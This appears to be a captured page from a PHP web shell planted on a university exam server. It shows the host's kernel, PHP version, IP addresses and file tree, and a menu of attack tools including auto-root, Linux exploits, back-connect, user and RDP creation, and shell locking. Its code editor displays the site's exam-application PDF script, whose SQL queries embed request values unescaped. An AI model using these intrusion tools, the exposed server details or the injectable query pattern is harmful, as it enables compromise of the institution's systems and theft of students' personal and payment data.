Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.216.167.229
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
sikkim /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Thumbs.db
19
KB
-rwxr-xr-x
applicationFormReportNEFT.php
39.95
KB
-rwxr-xr-x
applicationFormReportNEFT22.ph...
21.49
KB
-rwxr-xr-x
applicationFormReportNETBANKIN...
18.3
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
18.13
KB
-rwxr-xr-x
applicationFormReportSBM.php
17.02
KB
-rwxr-xr-x
candidate_list.php
64.47
KB
-rwxr-xr-x
candidate_list25.php
49.9
KB
-rwxr-xr-x
candidate_list_1112019.php
50.96
KB
-rwxr-xr-x
candidate_list_17092018.php
50.43
KB
-rwxr-xr-x
candidate_list_before_paygate....
43.83
KB
-rwxr-xr-x
cappcontext.php
3.19
KB
-rwxr-xr-x
cappdu.php
3.53
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
516
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.34
KB
-rwxr-xr-x
download_upload.html
2.6
KB
-rwxr-xr-x
ean13.php
2.83
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
mregistry.php
1.57
KB
-rwxr-xr-x
mregistry_before_paygate.php
1.17
KB
-rwxr-xr-x
mregistry_before_postoffice.ph...
1.04
KB
-rwxr-xr-x
razorpay_order_api.php
24.07
KB
-rw-rw-r--
report_admission_ticket.php
51.49
KB
-rwxr-xr-x
report_admission_ticket2211201...
34.94
KB
-rwxr-xr-x
report_admission_ticket_080620...
46.64
KB
-rwxr-xr-x
report_admission_ticket_bf_cov...
46.96
KB
-rwxr-xr-x
report_hall_ticket.php
11.36
KB
-rwxr-xr-x
report_hall_ticketold.php
11.36
KB
-rwxr-xr-x
revaluation.php
17.12
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
stringspliter.php
693
B
-rwxr-xr-x
student.php
4.75
KB
-rwxr-xr-x
subjectfreez.php
12.99
KB
-rwxr-xr-x
verifiedlistReport.php
7.01
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : applicationFormReportNEFT22.php
<?php $main_src=substr($_SERVER['SCRIPT_FILENAME'],0,strlen($_SERVER['SCRIPT_FILENAME'])-7); $pdf_writer_class =$main_src."/tarka_pdf/fpdf.php"; require_once($pdf_writer_class); require_once("report_hall_ticket.php"); require_once("stringspliter.php"); class applicationFormReport { function DefaultConstructor($aobj_context) { $this->aobj_context=$aobj_context; $this->pdf= new FPDF(); $this->pdf=$this; $this->app_no=trim($this->aobj_context->mobj_data["app_no"]); $this->ip=$_SERVER["REMOTE_ADDR"]; $get_date="select date_add(date_add(now(),INTERVAL 13 hour),interval 30 minute) as now_date"; $obj=$this->aobj_context->mobj_db->GetRow($get_date); require_once("getnumword.php"); $this->current_date=$obj[now_date]; $this->pdf = new FPDF('L'); /*$this->pdf->SetMargins(2,5,2); $this->pdf->addPage('L'); */ } function formcolldata() { $get_coll_name="select FUNIVNAME as 'FUNIVNAME', FUNIVADD1 as 'state', pdf_logo_path,ifnull(FEXAMAPPREQ,'F') as FEXAMAPPREQ From control"; $lobj_get_coll_name=$this->aobj_context->mobj_db->GetRow($get_coll_name); $this->FUNIVNAME=$lobj_get_coll_name['FUNIVNAME']; $this->s_state=$lobj_get_coll_name['state']; $this->f_year=$lobj_get_coll_name['f_year']; $this->pdf_logo_path=$lobj_get_coll_name['pdf_logo_path']; $this->FEXAMAPPREQ=$lobj_get_coll_name['FEXAMAPPREQ']; } function GetBankDetails() { $get_data="SELECT bank_name, acc_no, branch_name, branch_code, ifsc_code, cheque_favour, place,bank_charge FROM acc_mas where payment_type='{$this->FPAYMENTYPE}'"; $lobj_get_data= $this->aobj_context->mobj_db->GetRow($get_data); $this->bank_name=$lobj_get_data['bank_name']; $this->acc_no=$lobj_get_data['acc_no']; $this->branch_name=$lobj_get_data['branch_name']; $this->branch_code=$lobj_get_data['branch_code']; $this->ifsc_code=$lobj_get_data['ifsc_code']; $this->cheque_favour=$lobj_get_data['cheque_favour']; $this->place=$lobj_get_data['place']; $this->bank_charge=$lobj_get_data['bank_charge']; } function GetData() { $get_app_no=" select FREGNO ,FRECPTNO,FRECPTDATE,FTOTALFEE,FPAYMENTYPE,FFEETYPE,FCATEGORY from appcandsum where APPNO='{$this->app_no}'"; $obj_get_app_no=$this->aobj_context->mobj_db->GetRow($get_app_no); $this->reg_no=$obj_get_app_no['FREGNO']; $this->FRECPTDATE=$obj_get_app_no['FRECPTDATE']; $this->FTOTALFEE=$obj_get_app_no['FTOTALFEE']; $this->FPAYMENTYPE=$obj_get_app_no['FPAYMENTYPE']; $this->FCATEGORY=$obj_get_app_no['FCATEGORY']; $this->FFEETYPE=$obj_get_app_no['FFEETYPE']; $get_other_details="select date_format(current_date,'%d/%m/%Y') as curr_date,FDEGREE,FCOLLCODE,FNAME,CONCAT(IFNULL(FCURRADD1,''),' ',FCURRADD2) AS s_address from student where FREGNO='{$this->reg_no}' "; $lobj_get_name = $this->aobj_context->mobj_db->GetRow($get_other_details); $this->college_code=$lobj_get_name['FCOLLCODE']; $this->degree=$lobj_get_name['FDEGREE']; $this->student_name=$lobj_get_name['FNAME']; $this->s_address=$lobj_get_name['s_address']; $this->curr_date=$lobj_get_name['curr_date']; $get_exam_details="SELECT GROUP_CONCAT(DISTINCT FEXAMNO) AS FEXAMNO FROM appcanddet WHERE APPNO='{$this->app_no}'"; $lobj_get_exam_details= $this->aobj_context->mobj_db->GetRow($get_exam_details); $this->FEXAMNO= $lobj_get_exam_details['FEXAMNO']; $this->GetBankDetails(); } function WriteRect() { $this->pdf = new FPDF('L'); $this->pdf->SetMargins(0,2,2); $this->pdf->addPage(); $width=96; $this->pdf->Rect(2,5,$width,200); $this->pdf->Rect(2+$width+2,5,$width,200); $this->pdf->Rect(2+$width+$width+4,5,$width,200); if(!empty($this->pdf_logo_path)) { $img_logo_path=$this->aobj_context->main_src.$this->pdf_logo_path; $this->pdf->Image($img_logo_path,4,7,15); $this->pdf->Image($img_logo_path,$width+6,7,15); $this->pdf->Image($img_logo_path,$width+$width+7,7,15); } $this->pdf->setY(5); } function formData($label) { $line_height=5; $width=96; $x_pos=2; if($this->pos==2) $x_pos=2+$width+2; if($this->pos==3) $x_pos=2+$width+2+$width+2; $jump_width=$width; if($this->pos==2) $jump_width=$width; else if($this->pos==3) $jump_width=$width; $this->pdf->SetX($x_pos); $this->old_y=$this->pdf->GetY(); $this->pdf->SetFont('Times','B',9); $this->pdf->Cell($jump_width,$line_height,"Exam Application Form",'0',1,'C'); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height,$this->FUNIVNAME,'0',1,'C'); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height,$this->s_state,'0',1,'C'); $this->pdf->SetFont('Times','BU',9); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height,$label,'0',1,'C'); $this->pdf->SetFont('Times','B',9); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height,"From Bank____________________Branch______________________",'0',1,'C'); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height," Date_____________________",'0',1,'L'); $td1_width=$jump_width*(0.50)-1; $td2_width=$jump_width-$td1_width-2; $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width+$td2_width,$line_height-1,"Details of Applicant Remitter",'1',1,'C'); $this->pdf->SetFont('Times','B',10); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Reference/Applcation No",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->app_no}",'1',1,'L'); $this->pdf->SetFont('Times','B',10); $student_name = $this->student_name; $studentname = str_splitf($this->student_name,25); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Name",'LRT',0,'L'); $this->pdf->Cell($td2_width,$line_height,$studentname[0],'LRT',1,'L'); if($studentname[1] != '') { $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,10," ",'LRB',0,'L'); $this->pdf->Cell($td2_width,$line_height,$studentname[1],'LRB',1,'L'); } $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Roll. No",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->reg_no}",'1',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"College/Dept./Degree ",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->college_code} / {$this->degree}",'1',1,'L'); /* $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Category / Fee Type",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->FCATEGORY} / {$this->FFEETYPE}",'1',1,'L'); */ $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Account No. (if applicable)",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"",'1',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Cheque Details(if applicable)",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"",'1',1,'L'); $this->pdf->ln(2); $td1_width=$jump_width*(0.40)-1; $td2_width=$jump_width-$td1_width-2; $this->pdf->SetX($x_pos+1); $nb =0; $nb=max($nb,NbLines($td1_width,$this->cheque_favour,'')); $yH = $line_height*$nb; $this->pdf->Cell($td1_width+$td2_width,$line_height,"Details of Beneficiary",'1',1,'C'); $this->pdf->SetFont('Times','B',10); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Beneficary's Name",'1',0,'L'); $this->pdf->MultiCell($td2_width,$line_height,"{$this->cheque_favour}",1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Beneficary's A/C No",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->acc_no}",'1',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->SetFont('Times','B',10); $this->pdf->Cell($td1_width,$line_height,"Center",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->place}",'1',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"Bank/Branch",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->bank_name} / {$this->branch_name}",'1',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($td1_width,$line_height,"IFSC Code",'1',0,'L'); $this->pdf->Cell($td2_width,$line_height,"{$this->ifsc_code}",'1',1,'L'); $this->pdf->SetFont('Times','B',10); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height," Amount To Be Remitted Rs {$this->FTOTALFEE}/-",'0',1,'L'); $this->pdf->SetX($x_pos); $in_words=getNumber($this->FTOTALFEE); $this->pdf->Cell($jump_width,$line_height," Rupees {$in_words}",'0',1,'L'); $this->pdf->SetFont('Times','',10); $this->pdf->SetX($x_pos+1); $this->pdf->MultiCell($jump_width,$line_height,'1. Amount to be remitted as per details enumerated above',0,"L"); $this->pdf->SetX($x_pos+1); $this->pdf->MultiCell($jump_width,$line_height,'2. Not Transferable',0,"L"); /* $this->pdf->SetX($x_pos+1); $this->pdf->Cell($jump_width,$line_height,"3. Not Transferable",'0',1,'L'); */ $this->pdf->ln(3); $this->pdf->SetFont('Times','B',10); $this->pdf->SetX($x_pos); $this->pdf->Cell($jump_width,$line_height,"Applicant's Signature ",'0',1,'R'); $this->pdf->ln(3); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($jump_width-2.5,$line_height,"Payment particulars- Cash/Transfer Date:",'1',1,'L'); $this->pdf->SetX($x_pos+1); $tdd1_width=$jump_width*(0.25); $tdd2_width=($jump_width)*.25 ; $tdd3_width=($jump_width-$tdd2_width)*.60+2; $this->pdf->Cell($tdd1_width,$line_height,"",'L',0,'L'); $this->pdf->Cell($tdd2_width,$line_height,"",'R',0,'L'); $this->pdf->Cell($tdd3_width,$line_height," ",'R',1,'L'); /* $this->pdf->SetX($x_pos+1); $this->pdf->Cell($tdd1_width,$line_height,"Bank Charges",'1',0,'L'); $this->pdf->Cell($tdd2_width,$line_height,"Rs {$this->bank_charge}/-",'1',0,'L'); $this->pdf->Cell($tdd3_width,$line_height," ",'R',1,'L'); */ $this->pdf->SetX($x_pos+1); //$total=($this->FTOTALFEE+$this->bank_charge); $total=$this->FTOTALFEE; $this->pdf->Cell($tdd1_width,$line_height,"Total Amount",'1',0,'L'); $this->pdf->Cell($tdd2_width,$line_height,"Rs {$total}/-",'1',0,'L'); $this->pdf->Cell($tdd3_width,$line_height,"Seal & Signature ",'BR',1,'C'); $this->pdf->ln(2); $this->pdf->SetX($x_pos+1); $in_words=getNumber($total); $this->pdf->Cell($jump_width,$line_height,"Rupees {$in_words}",'0',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->SetFont('Times','',10); $this->pdf->Cell($jump_width,$line_height,"Cash Received/Debited Applicants A/C",'0',1,'L'); $this->pdf->ln(2); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($tdd1_width,$line_height,"Remitance/",'LRT',0,'L'); $this->pdf->Cell($tdd2_width+10,$line_height," ",'LRT',1,'L'); $this->pdf->SetX($x_pos+1); $this->pdf->Cell($tdd1_width,$line_height,"UTR Number",'LRB',0,'L'); $this->pdf->Cell($tdd1_width+10,$line_height," ",'LRB',0,'L'); $this->pdf->Cell($tdd1_width+10,$line_height," Authorised Signatory",'0',1,'L'); $this->pdf->SetY($this->old_y); $img_path=$this->aobj_context->main_src.$this->photo_path; } function SendOutput() { $this->pdf->Output("application_letter_{$this->app_no}.pdf","D"); } function WriteHallTicket() { $aobj_context=$this->aobj_context; $class_obj=new AdmissionTicket($aobj_context); ini_set("memory_limit",-1); ini_set('max_execution_time',3300); $class_obj->app_no =$this->app_no; $get_data="SELECT FDEGREE,FREGNO FROM appcandsum WHERE APPNO='{$class_obj->app_no}' "; $obj_get_data = $aobj_context->mobj_db->GetRow($get_data); $class_obj->degree_code = $obj_get_data['FDEGREE']; $class_obj->registor_no_starts = $obj_get_data['FREGNO']; $class_obj->registor_no_ends = $obj_get_data['FREGNO']; //if(preg_match('[^BTH]', $class_obj->degree_code)) if(preg_match('[^BTH]', $class_obj->degree_code)) $class_obj->bth_flag=1; $pdf=$this->pdf; $pdf->SetMargins(20,-3,35); $pdf->aobj_context =$aobj_context ; $pdf->WhichReport = 'AdmissionTicket'; $pdf->SetFillColor(248, 248 ,255); $pdf->SetFont('Times','',10); $pdf->AddPage("P"); $pdf->Rect(2,05,200,278.5); $adm_details=$class_obj->getUniversityDetails(); $adm_details=$class_obj->getCollegeDetails(); $adm_details=$class_obj->getStudentDetails(); $adm_details=$class_obj->getSubjectAppearing(); $page_cnt=1; $copy = "Exam Copy"; foreach($class_obj->std_arr as $reg_k=>$reg_v) { //if(!array_key_exists($reg_v['FREGNO'],$class_obj->receipt_date_arr)) //continue; $full_photo_path=""; $full_photo_path=trim($aobj_context->main_src."/".$reg_v[photo_path]); $FTOTALFEE=$reg_v[FTOTALFEE]; //$pdf->Ln(3); $year = substr($reg_v['EXAMDATE'], -4); //var_dump($year); if($reg_v['FMEEXAMTYP'] == '2') { $examtype = "ODD SEMESTER"; }else if($reg_v['FMEEXAMTYP'] == '1') { $examtype = "EVEN SEMESTER"; } //$pdf->SetLineWidth(0.01); $pdf->SetLineWidth(0.01); $pdf->SetFont('Times','B',14); $img_path=$aobj_context->main_src."/img/report_uni_logo.jpg"; if(file_exists($img_path)) $pdf->Image($img_path,15,14,22); $pdf->Cell(0,4,$class_obj->std_FUNIVNAME,0,1,'C'); $pdf->SetFont('Times','',9); $pdf->Cell(0,4,$this->s_state ,'0',1,'C'); $pdf->SetFont('Times','B',13); $pdf->Ln(2); $pdf->Cell(0,5,'EXAM APPLICATION FORM' ,'0',0,'C'); $pdf->SetFont('Times','B',10); $pdf->Cell(20,5,$copy ,'0',1,'R'); $pdf->SetFont('Times','B',10); $pdf->Cell(0,5,$examtype.' EXAMINATION '.$year ,'0',1,'C'); $pdf->SetFont('Times','',12); $pdf->Ln(5); $pdf->SetFont('Times','',12); if(file_exists($full_photo_path) && !empty($reg_v[photo_path])) { $pdf->Image($full_photo_path,155,$pdf->GetY(),27,27); } $pdf->SetFont('Times','B',11); $pdf->Cell(30,6,' App. No.',0,0,'L'); $pdf->Cell(6,6,' : ',0,0,'L'); $pdf->SetFont('Times','',11); $pdf->Cell(120,6,''.$class_obj->app_no,0,1,'L'); $pdf->SetFont('Times','B',11); $pdf->Cell(30,6,' App. Date',0,0,'L'); $pdf->Cell(6,6,' : ',0,0,'L'); $pdf->SetFont('Times','',11); $pdf->Cell(120,6,''.$reg_v['FAPPDATE'],0,1,'L'); $pdf->SetFont('Times','B',11); $pdf->Cell(30,6,' Course',0,0,'L'); $pdf->Cell(6,6,' : ',0,0,'L'); $pdf->SetFont('Times','',11); $pdf->Cell(120,6,''.$reg_v['COURSE'],0,1,'L'); $pdf->SetFont('Times','B',11); $pdf->Cell(30,6,' College',0,0,'L'); $pdf->Cell(6,6,' : ',0,0,'L'); $pdf->SetFont('Times','',11); $pdf->MultiCell(90,6,''.$reg_v['CollDetails'],0,"L"); $pdf->SetFont('Times','B',11); $pdf->Cell(30,6,' Reg. No.',0,0,'L'); $pdf->Cell(6,6,' : ',0,0,'L'); $pdf->SetFont('Times','',11); $pdf->Cell(120,6,''.$reg_v['FREGNO'],0,1,'L'); $pdf->SetFont('Times','B',11); $pdf->Cell(30,6," Student's Name",0,0,'L'); $pdf->Cell(6,6,' : ',0,0,'L'); $pdf->SetFont('Times','',11); $pdf->Cell(120,6,''.$reg_v['FNAME'],0,1,'L'); $pdf->Ln(1); $pdf->SetFont('Times','B',11); $pdf->Cell(0,5,'Papers Appearing',0,1,'C'); $pdf->Cell(8,5,"Sl.","LRT",0,"C"); $pdf->Cell(8,5,"Sem.","LRT",0,"C"); $pdf->Cell(22,5,"Sub.","LRT",0,"C"); $pdf->Cell(100,5,"Subject Title","LRT",0,"C"); $pdf->Cell(30,5,"Reg/Imp","LRT",1,"C"); $pdf->Cell(8,3,"No.","LRB",0,"C"); $pdf->Cell(8,3,"","LRB",0,"C"); $pdf->Cell(22,3,"Code","LRB",0,"C"); $pdf->Cell(100,3,"","LRB",0,"C"); $pdf->Cell(30,3,"","LRB",1,"C"); $pdf->SetFont('Times','',11); $sub_arr=$reg_v['SUBCODE']; $subj_arr = explode("~",$sub_arr); //var_dump($subj_arr); $sl_no=1; foreach($subj_arr as $ek) { $explode_arr = explode("->",$ek); if($explode_arr[2] == 'A') { $sem = 'I'; }else if($explode_arr[2] == 'B') { $sem = 'II'; }else if($explode_arr[2] == 'C') { $sem = 'III'; }else if($explode_arr[2] == 'D') { $sem = 'IV'; }else if($explode_arr[2] == 'E') { $sem = 'V'; }else if($explode_arr[2] == 'F') { $sem = 'VI'; }else if($explode_arr[2] == 'G') { $sem = 'VII'; }else if($explode_arr[2] == 'H') { $sem = 'VIII'; }else if($explode_arr[2] == 'I') { $sem = 'IX'; }else if($explode_arr[2] == 'J') { $sem = 'X'; } //var_dump($sem); //var_dump($explode_arr);die(); $regimp = ''; if($explode_arr[2] == $explode_arr[3] ) $regimp = 'Regular'; else $regimp = 'Improvement'; $pdf->Cell(8,6, $sl_no,"1",0,"C"); $pdf->Cell(8,6,$sem,"1",0,"C"); $pdf->Cell(22,6, $explode_arr[4],"1",0,"C"); $sub_short=$explode_arr[5]; if($class_obj->bth_flag==1) { $pdf->Cell(100,6,$explode_arr[1]." [{$sub_short}]","1",0,"L"); $pdf->Cell(15,6,$explode_arr[4],"1",0,"C"); $pdf->Cell(15,6,$regimp,"1",1,"C"); } else { $pdf->Cell(100,6,$explode_arr[1],"1",0,"L"); $pdf->Cell(30,6,$regimp,"1",1,"L"); //regimp } $sl_no++; } $pdf->SetFont('Times','B',11); $pdf->ln(2); $pdf->Cell(80,6,"Total Improvement Fee (@Rs.500/-per subject) : Rs {$FTOTALFEE}/-","10",1,"L"); $pdf->ln(8); $pdf->Cell(70,6,"Signature of the Student","10",1,"L"); $pdf->cell(70,6,"Date","0",1,"L"); $llineht = 6; $pdf->SetFont('Times','B',11); $pdf->cell(0,$llineht,"For College/Department Use Only","0",1,"C"); $pdf->SetFont('Times','',11); $pdf->cell(84,$llineht,"Head/In Charge of Department Signature ","LRT",0,"L"); $pdf->cell(84,$llineht,"Principal Signature (Affiliated College)","LRT",1,"L"); $pdf->cell(84,$llineht," ","LR",0,"L"); $pdf->cell(84,$llineht," ","LR",1,"L"); $pdf->cell(84,$llineht,"Seal","LR",0,"L"); $pdf->cell(84,$llineht,"Seal","LR",1,"L"); $pdf->cell(84,$llineht," ","LR",0,"L"); $pdf->cell(84,$llineht," ","LR",1,"L"); $pdf->cell(84,$llineht,"Date","LRB",0,"L"); $pdf->cell(84,$llineht,"Date","LRB",1,"L"); $pdf->ln(10); //$pdf->cell(160,$llineht,"In order to be eligible to appear for end semester examinations,","0",1,"L"); //$pdf->cell(160,$llineht,"student must have the requisite minimum number of attendance as prescribed by the University regulations,","0",1,"L"); //$pdf->cell(160,$llineht,"student must have the requisite minimum number of attendance as prescribed by the University regulations,","0",1,"L"); // , must have appeared in all the relevant internal examinations and satisfy other criteria as applicable under relevant regulations of the //University. //$pdf->cell(10,$llineht,"Please Note -","",0,"L"); $pdf->SetMargins(15,-3,20); $pdf->Cell(170,5,"Please Note - In order to be eligible to appear for end semester examinations student must have, the requisite ",0,1,"L"); $pdf->Cell(150,5," minimum number of attendance, appeared in all the relevant internal examinations,paid the",0,1,"L"); $pdf->Cell(150,5," necessary fees and satisfy other criteria as applicable under relevant regulations of the University.",0,1,"L"); // $pdf->Cell(150,5," ",0,1,"L"); $note1 = "Please Note - In order to be eligible to appear for end semester examinations, student must have the requisite minimum number of attendance as prescribed by the University regulations, must have appeared in all the relevant internal examinations and satisfy other criteria as applicable under relevant regulations of the University."; $note2 = " Students are advised to keep a copy of this application for future reference"; //$pdf->MultiCell(170,4,$note1,0,"J"); $pdf->ln(2); $pdf->Cell(150,5,$note2,0,1,"L"); } } } function PrintApplicationFormNEFT($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $class_obj=new applicationFormReport(); $class_obj->DefaultConstructor($aobj_context); $class_obj->formcolldata(); $class_obj->GetData(); if($class_obj->FTOTALFEE > 0) { $class_obj->WriteRect(); $class_obj->pos=1; $class_obj->formData("BANK COPY"); $class_obj->pos=2; $class_obj->formData("EXAM COPY"); $class_obj->pos=3; $class_obj->formData("STUDENT COPY"); } if($class_obj->FEXAMAPPREQ=="T" ) { $class_obj->WriteHallTicket(); } $class_obj->SendOutput(); } function NbLines($w,$txt,$pdf) { //Computes the number of lines a MultiCell of width w will take $cw=&$pdf->CurrentFont['cw']; if($w==0) $w=$pdf->w-$pdf->rMargin-$pdf->x; $wmax=($w-2*$pdf->cMargin)*1000/$pdf->FontSize; $s=str_replace("\r",'',$txt); $nb=strlen($s); if($nb>0 and $s[$nb-1]=="\n") $nb--; $sep=-1; $i=0; $j=0; $l=0; $nl=1; while($i<$nb){ $c=$s[$i]; if($c=="\n"){ $i++; $sep=-1; $j=$i; $l=0; $nl++; continue; } if($c==' ') $sep=$i; $l+=$cw[$c]; if($l>$wmax){ if($sep==-1){ if($i==$j) $i++; } else $i=$sep+1; $sep=-1; $j=$i; $l=0; $nl++; } else $i++; } return $nl; } ?>
Close